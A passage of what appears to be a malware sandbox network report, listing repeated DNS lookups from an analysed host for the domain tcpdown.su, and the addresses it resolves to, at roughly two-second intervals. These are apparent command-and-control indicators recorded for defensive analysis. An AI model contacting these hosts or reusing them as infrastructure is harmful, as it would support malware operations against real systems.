Jan 7, 2025 01:09:38.522713900 CET	48822	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:38.529294014 CET	53	48822	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:38.547946930 CET	50223	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:38.562469006 CET	53	50223	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:38.572882891 CET	33022	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:38.581551075 CET	53	33022	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:38.587898970 CET	57662	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:38.596405029 CET	53	57662	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:40.468266010 CET	44988	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:40.475193977 CET	53	44988	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:40.477267981 CET	41907	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:40.485817909 CET	53	41907	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:40.487668991 CET	45483	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:40.494653940 CET	53	45483	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:40.496727943 CET	36872	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:40.508982897 CET	53	36872	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:40.510910034 CET	58581	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:40.529908895 CET	53	58581	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:40.531765938 CET	33180	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:40.539072037 CET	53	33180	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:42.380412102 CET	44590	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:42.391825914 CET	53	44590	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:42.393699884 CET	46774	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:42.402287960 CET	53	46774	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:42.404100895 CET	38605	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:42.411350965 CET	53	38605	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:42.413222075 CET	39283	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:42.420355082 CET	53	39283	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:42.422086954 CET	44026	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:42.436883926 CET	53	44026	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:42.438721895 CET	37271	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:42.453128099 CET	53	37271	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:44.302591085 CET	55138	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:44.309570074 CET	53	55138	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:44.310592890 CET	49678	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:44.323880911 CET	53	49678	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:44.325252056 CET	45459	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:44.332304955 CET	53	45459	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:44.333389044 CET	50753	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:44.350178003 CET	53	50753	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:44.351125956 CET	45082	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:44.369431019 CET	53	45082	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:44.370354891 CET	54013	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:44.388986111 CET	53	54013	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:46.244573116 CET	43667	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:46.251554966 CET	53	43667	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:46.252288103 CET	42095	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:46.260752916 CET	53	42095	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:46.261457920 CET	58705	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:46.268454075 CET	53	58705	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:46.269134998 CET	57895	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:46.276242971 CET	53	57895	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:46.276952028 CET	51971	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:46.283740997 CET	53	51971	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:46.284408092 CET	56741	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:46.291398048 CET	53	56741	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:48.181046009 CET	36213	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:48.191108942 CET	53	36213	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:48.192214012 CET	46024	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:48.202320099 CET	53	46024	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:48.203195095 CET	36091	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:48.220556974 CET	53	36091	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:48.221322060 CET	57144	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:48.228368044 CET	53	57144	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:48.229115009 CET	35148	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:48.236027956 CET	53	35148	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:48.236733913 CET	51098	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:48.243966103 CET	53	51098	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:49.805620909 CET	46402	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:49.812753916 CET	53	46402	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:49.813316107 CET	49531	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:49.820650101 CET	53	49531	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:49.821207047 CET	35018	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:49.828130960 CET	53	35018	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:49.828659058 CET	38781	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:49.835601091 CET	53	38781	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:49.836086035 CET	40557	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:49.843921900 CET	53	40557	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:49.844455957 CET	40187	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:49.859469891 CET	53	40187	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:51.743781090 CET	51265	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:51.750874996 CET	53	51265	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:51.751450062 CET	42867	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:51.758481026 CET	53	42867	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:51.758986950 CET	57948	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:51.777852058 CET	53	57948	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:51.778388977 CET	53106	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:51.792006016 CET	53	53106	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:51.792524099 CET	38851	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:51.800055027 CET	53	38851	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:51.800553083 CET	45833	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:51.808662891 CET	53	45833	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:53.346074104 CET	48059	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:53.353468895 CET	53	48059	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:53.354371071 CET	43312	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:53.361603975 CET	53	43312	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:53.362312078 CET	40606	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:53.369473934 CET	53	40606	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:53.370143890 CET	46744	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:53.388869047 CET	53	46744	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:53.389559984 CET	38432	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:53.396502018 CET	53	38432	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:53.397151947 CET	37162	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:53.404627085 CET	53	37162	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:55.094849110 CET	52991	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:55.104242086 CET	53	52991	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:55.104981899 CET	46545	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:55.114089012 CET	53	46545	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:55.114748955 CET	60278	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:55.135445118 CET	53	60278	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:55.136492968 CET	38368	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:55.145930052 CET	53	38368	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:55.146812916 CET	38585	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:55.156394958 CET	53	38585	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:55.157094955 CET	47273	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:55.166430950 CET	53	47273	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:56.802767992 CET	56089	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:56.809972048 CET	53	56089	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:56.810626030 CET	44388	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:56.817677021 CET	53	44388	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:56.818334103 CET	47398	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:56.825311899 CET	53	47398	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:56.825978994 CET	36869	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:56.833046913 CET	53	36869	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:56.833672047 CET	55234	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:56.840703964 CET	53	55234	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:56.841391087 CET	45183	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:56.848447084 CET	53	45183	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:58.523789883 CET	40410	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:58.533010960 CET	53	40410	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:58.533725977 CET	41564	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:58.541791916 CET	53	41564	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:58.542604923 CET	60081	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:58.552382946 CET	53	60081	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:58.553075075 CET	45418	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:58.561439991 CET	53	45418	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:58.562124968 CET	46951	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:58.570235014 CET	53	46951	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:58.570924997 CET	58725	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:58.591775894 CET	53	58725	1.1.1.1	192.168.2.13
Jan 7, 2025 01:10:00.569933891 CET	33797	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:10:00.577289104 CET	53	33797	1.1.1.1	192.168.2.13
Jan 7, 2025 01:10:00.577877045 CET	33296	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:10:00.624587059 CET	53	33296	1.1.1.1	192.168.2.13
Jan 7, 2025 01:10:00.625241995 CET	49993	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:10:00.719167948 CET	53	49993	1.1.1.1	192.168.2.13
Jan 7, 2025 01:10:00.719957113 CET	43796	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:10:00.759258986 CET	53	43796	1.1.1.1	192.168.2.13
Jan 7, 2025 01:10:00.760140896 CET	53604	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:10:00.767234087 CET	53	53604	1.1.1.1	192.168.2.13
Jan 7, 2025 01:10:00.768326044 CET	50562	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:10:00.786473036 CET	53	50562	1.1.1.1	192.168.2.13

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 01:09:36.300565004 CET	192.168.2.13	1.1.1.1	0x9b5f	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.312282085 CET	192.168.2.13	1.1.1.1	0x99cd	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.330194950 CET	192.168.2.13	1.1.1.1	0x99cd	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.342773914 CET	192.168.2.13	1.1.1.1	0x99cd	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.355298996 CET	192.168.2.13	1.1.1.1	0x99cd	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.368201971 CET	192.168.2.13	1.1.1.1	0x99cd	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.288156033 CET	192.168.2.13	1.1.1.1	0xa171	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.355067968 CET	192.168.2.13	1.1.1.1	0x9fb2	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.522713900 CET	192.168.2.13	1.1.1.1	0x9fb2	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.547946930 CET	192.168.2.13	1.1.1.1	0x9fb2	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.572882891 CET	192.168.2.13	1.1.1.1	0x9fb2	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.587898970 CET	192.168.2.13	1.1.1.1	0x9fb2	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.468266010 CET	192.168.2.13	1.1.1.1	0x7b76	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.477267981 CET	192.168.2.13	1.1.1.1	0xfdb	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.487668991 CET	192.168.2.13	1.1.1.1	0xfdb	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.496727943 CET	192.168.2.13	1.1.1.1	0xfdb	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.510910034 CET	192.168.2.13	1.1.1.1	0xfdb	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.531765938 CET	192.168.2.13	1.1.1.1	0xfdb	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.380412102 CET	192.168.2.13	1.1.1.1	0xf191	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.393699884 CET	192.168.2.13	1.1.1.1	0x58e1	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.404100895 CET	192.168.2.13	1.1.1.1	0x58e1	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.413222075 CET	192.168.2.13	1.1.1.1	0x58e1	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.422086954 CET	192.168.2.13	1.1.1.1	0x58e1	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.438721895 CET	192.168.2.13	1.1.1.1	0x58e1	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.302591085 CET	192.168.2.13	1.1.1.1	0x2fe8	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.310592890 CET	192.168.2.13	1.1.1.1	0x3aa0	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.325252056 CET	192.168.2.13	1.1.1.1	0x3aa0	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.333389044 CET	192.168.2.13	1.1.1.1	0x3aa0	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.351125956 CET	192.168.2.13	1.1.1.1	0x3aa0	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.370354891 CET	192.168.2.13	1.1.1.1	0x3aa0	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.244573116 CET	192.168.2.13	1.1.1.1	0x42f5	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.252288103 CET	192.168.2.13	1.1.1.1	0x93d7	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.261457920 CET	192.168.2.13	1.1.1.1	0x93d7	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.269134998 CET	192.168.2.13	1.1.1.1	0x93d7	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.276952028 CET	192.168.2.13	1.1.1.1	0x93d7	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.284408092 CET	192.168.2.13	1.1.1.1	0x93d7	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.181046009 CET	192.168.2.13	1.1.1.1	0x27b0	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.192214012 CET	192.168.2.13	1.1.1.1	0x8e4	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.203195095 CET	192.168.2.13	1.1.1.1	0x8e4	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.221322060 CET	192.168.2.13	1.1.1.1	0x8e4	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.229115009 CET	192.168.2.13	1.1.1.1	0x8e4	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.236733913 CET	192.168.2.13	1.1.1.1	0x8e4	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.805620909 CET	192.168.2.13	1.1.1.1	0xca71	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.813316107 CET	192.168.2.13	1.1.1.1	0x2d37	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.821207047 CET	192.168.2.13	1.1.1.1	0x2d37	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.828659058 CET	192.168.2.13	1.1.1.1	0x2d37	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.836086035 CET	192.168.2.13	1.1.1.1	0x2d37	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.844455957 CET	192.168.2.13	1.1.1.1	0x2d37	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.743781090 CET	192.168.2.13	1.1.1.1	0x6269	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.751450062 CET	192.168.2.13	1.1.1.1	0x5b77	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.758986950 CET	192.168.2.13	1.1.1.1	0x5b77	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.778388977 CET	192.168.2.13	1.1.1.1	0x5b77	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.792524099 CET	192.168.2.13	1.1.1.1	0x5b77	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.800553083 CET	192.168.2.13	1.1.1.1	0x5b77	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.346074104 CET	192.168.2.13	1.1.1.1	0x9e6e	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.354371071 CET	192.168.2.13	1.1.1.1	0x3fae	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.362312078 CET	192.168.2.13	1.1.1.1	0x3fae	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.370143890 CET	192.168.2.13	1.1.1.1	0x3fae	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.389559984 CET	192.168.2.13	1.1.1.1	0x3fae	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.397151947 CET	192.168.2.13	1.1.1.1	0x3fae	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.094849110 CET	192.168.2.13	1.1.1.1	0xbaf4	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.104981899 CET	192.168.2.13	1.1.1.1	0xc370	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.114748955 CET	192.168.2.13	1.1.1.1	0xc370	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.136492968 CET	192.168.2.13	1.1.1.1	0xc370	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.146812916 CET	192.168.2.13	1.1.1.1	0xc370	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.157094955 CET	192.168.2.13	1.1.1.1	0xc370	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.802767992 CET	192.168.2.13	1.1.1.1	0xfb1d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.810626030 CET	192.168.2.13	1.1.1.1	0x83b6	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.818334103 CET	192.168.2.13	1.1.1.1	0x83b6	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.825978994 CET	192.168.2.13	1.1.1.1	0x83b6	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.833672047 CET	192.168.2.13	1.1.1.1	0x83b6	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.841391087 CET	192.168.2.13	1.1.1.1	0x83b6	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.523789883 CET	192.168.2.13	1.1.1.1	0x89ed	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.533725977 CET	192.168.2.13	1.1.1.1	0x4c3f	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.542604923 CET	192.168.2.13	1.1.1.1	0x4c3f	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.553075075 CET	192.168.2.13	1.1.1.1	0x4c3f	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.562124968 CET	192.168.2.13	1.1.1.1	0x4c3f	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.570924997 CET	192.168.2.13	1.1.1.1	0x4c3f	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.569933891 CET	192.168.2.13	1.1.1.1	0xfe02	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.577877045 CET	192.168.2.13	1.1.1.1	0x8b04	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.625241995 CET	192.168.2.13	1.1.1.1	0x8b04	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.719957113 CET	192.168.2.13	1.1.1.1	0x8b04	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.760140896 CET	192.168.2.13	1.1.1.1	0x8b04	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.768326044 CET	192.168.2.13	1.1.1.1	0x8b04	Standard query (0)	tcpdown.suF	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 01:09:36.308017969 CET	1.1.1.1	192.168.2.13	0x9b5f	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.308017969 CET	1.1.1.1	192.168.2.13	0x9b5f	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.308017969 CET	1.1.1.1	192.168.2.13	0x9b5f	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.308017969 CET	1.1.1.1	192.168.2.13	0x9b5f	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.308017969 CET	1.1.1.1	192.168.2.13	0x9b5f	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.308017969 CET	1.1.1.1	192.168.2.13	0x9b5f	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.308017969 CET	1.1.1.1	192.168.2.13	0x9b5f	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.326466084 CET	1.1.1.1	192.168.2.13	0x99cd	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.338979006 CET	1.1.1.1	192.168.2.13	0x99cd	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.351916075 CET	1.1.1.1	192.168.2.13	0x99cd	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.364597082 CET	1.1.1.1	192.168.2.13	0x99cd	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:36.381639004 CET	1.1.1.1	192.168.2.13	0x99cd	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.297297001 CET	1.1.1.1	192.168.2.13	0xa171	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.297297001 CET	1.1.1.1	192.168.2.13	0xa171	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.297297001 CET	1.1.1.1	192.168.2.13	0xa171	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.297297001 CET	1.1.1.1	192.168.2.13	0xa171	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.297297001 CET	1.1.1.1	192.168.2.13	0xa171	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
